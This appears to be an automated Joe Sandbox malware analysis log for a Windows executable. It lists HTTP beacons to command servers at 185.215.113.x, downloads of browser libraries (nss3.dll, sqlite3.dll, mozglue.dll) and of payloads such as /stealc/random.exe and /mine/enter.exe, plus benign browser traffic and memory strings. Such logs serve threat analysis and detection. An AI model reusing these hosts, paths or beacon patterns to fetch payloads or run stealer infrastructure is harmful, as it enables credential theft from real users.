Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 37 32 38 37 36 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB72876B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: Joe Sandbox View IP Address: 23.200.0.42 23.200.0.42
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49717 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.168.2.6:49717 -> 173.222.162.64:443 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEjXkpY1miL806lUCCtQlrHu-H96g/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722587837&P2=404&P3=2&P4=he9zOfFPGomWqUf%2bq60bvAktCaXNv7E1bcbLxjuW%2fMM8sr75kGmryXCD%2f3%2b2aVWg2qj4lUl5oSURoDhAgWsTVQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: yx88zYcXHnbQW/SwlJ9lNVSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=5518710994624701133&ACHANNEL=4&ABUILD=117.0.5938.150&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=150 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1941245123&timestamp=1721983046487 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=ktTC0cHX2KkJD_Yx6Lir0ZiA-RXTW3TBfjdtr3BA9J0djPpWwp7HDJi58DUUMslPOcdyqgJt539dXCOZftNIcyffQCc5bRBL5UeRB0veDqR12KTTRXoDhch1UwQIE2X4-qVoHZAhlqX-Q2MgI4ClYRQuOBZ7zk-xxlSTc4FXFRaWMS0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"5 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3324674203.00000169D16D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3233159876.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3380737606.00000169D1B9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3381137545.00000169CD9B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2821879892.0000029FD2C6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823432869.0000029FD2C81000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2821980090.0000029FD2C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3383948586.00000169CBDB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBDB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBDB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3324674203.00000169D16D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
